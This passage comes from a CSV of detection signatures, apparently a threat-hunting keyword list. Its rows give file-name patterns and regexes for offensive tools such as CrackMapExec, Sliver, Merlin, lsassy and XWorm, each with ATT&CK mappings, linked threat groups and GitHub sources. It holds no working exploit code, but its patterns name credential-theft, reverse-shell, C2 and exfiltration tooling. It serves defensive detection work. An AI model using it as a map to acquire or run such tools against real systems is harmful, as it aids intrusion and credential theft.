TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14538" "*\ClearnTempLog.ps1*",".{0,1000}\\ClearnTempLog\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - 
T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14539" "*\clfs_eop.cpp*",".{0,1000}\\clfs_eop\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","14540" "*\clfs_eop.exe*",".{0,1000}\\clfs_eop\.exe.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","14541" "*\ClickJack.csproj*",".{0,1000}\\ClickJack\.csproj.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14542" "*\ClickJack.exe",".{0,1000}\\ClickJack\.exe","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - 
TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14543" "*\clipboard.ps1*",".{0,1000}\\clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14544" "*\Clipboard.ps1*",".{0,1000}\\Clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14545" "*\ClipboardMITM.py*",".{0,1000}\\ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a 
honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","14546" "*\cliws.exe*",".{0,1000}\\cliws\.exe.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","14547" "*\CloakNDaggerC2*",".{0,1000}\\CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","14548" "*\clop1.txt*",".{0,1000}\\clop1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14549" "*\clop2.txt*",".{0,1000}\\clop2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14550" "*\cloud_enum.py*",".{0,1000}\\cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","14551" "*\CLR-Injection_x64.bat*",".{0,1000}\\CLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14558" "*\CLR-Injection_x86.bat*",".{0,1000}\\CLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14559" "*\CLR-Injection-main*",".{0,1000}\\CLR\-Injection\-main.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14560" "*\cmd_payload_x64.exe*",".{0,1000}\\cmd_payload_x64\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14562" "*\cmd_payload_x86.exe*",".{0,1000}\\cmd_payload_x86\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - 
T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14563" "*\cme.exe* -d * -u * -H *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14565" "*\cme.exe* -d * -u * -p *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14566" "*\cme.exe* --shares*",".{0,1000}\\cme\.exe.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14567" "*\CMLoot.ps1*",".{0,1000}\\CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","14568" "*\cmstp_uac.ahk*",".{0,1000}\\cmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming 
framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14569" "*\cobaltProtectMyTooling.conf*",".{0,1000}\\cobaltProtectMyTooling\.conf.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14570" "*\code_exec.ps1*",".{0,1000}\\code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14571" "*\codeloader.exe*",".{0,1000}\\codeloader\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","14572" "*\CoercedPotato.cpp*",".{0,1000}\\CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","14573" "*\coercer.exe*",".{0,1000}\\coercer\.exe.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a 
Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","14574" "*\Coercer.py*",".{0,1000}\\Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","14575" "*\COFFLoader.exe*",".{0,1000}\\COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","14576" "*\combine.exe*",".{0,1000}\\combine\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","14577" "*\combine_gui.exe*",".{0,1000}\\combine_gui\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","14578" "*\COMHijackToolkit.ps1*",".{0,1000}\\COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14579" "*\COMHijackToolkit\*",".{0,1000}\\COMHijackToolkit\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14580" "*\COM-Hunter.csproj*",".{0,1000}\\COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14581" "*\COM-Hunter.exe*",".{0,1000}\\COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14582" "*\COM-Hunter.sln*",".{0,1000}\\COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14583" "*\COMInject.exe*",".{0,1000}\\COMInject\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14584" 
"*\COMInject.sln*",".{0,1000}\\COMInject\.sln.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14585" "*\COMInjectTarget.cpp*",".{0,1000}\\COMInjectTarget\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14586" "*\COMInjectTarget.dll*",".{0,1000}\\COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14587" "*\COMInjectTarget\*",".{0,1000}\\COMInjectTarget\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14588" "*\Command Reciever.exe*",".{0,1000}\\Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14589" "*\command\exec\sideload.go*",".{0,1000}\\command\\exec\\sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform 
adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14590" "*\command\exec\spawndll.go*",".{0,1000}\\command\\exec\\spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14591" "*\command_exec.exe*",".{0,1000}\\command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14592" "*\commands\CameraScreenShot.cs*",".{0,1000}\\commands\\CameraScreenShot\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14593" "*\Commands\Machinecredentials.cs*",".{0,1000}\\Commands\\Machinecredentials\.cs.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","14594" "*\common_pass.txt*",".{0,1000}\\common_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","14595" "*\COM-Object-hijacking-master*",".{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","14596" "*\CompressArchiveCommand.cs",".{0,1000}\\CompressArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14598" "*\comsvcs_stealth.py*",".{0,1000}\\comsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","14599" "*\ComunicationC2.cpp*",".{0,1000}\\ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","14600" "*\CONCRETE_STEEL.exe""*",".{0,1000}\\CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14601" "*\Configure-Server.psm1*",".{0,1000}\\Configure\-Server\.psm1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - 
TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14604" "*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14605" "*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14606" "*\Confuser.CLI.exe*",".{0,1000}\\Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14607" "*\ConfuserEx.exe*",".{0,1000}\\ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14608" 
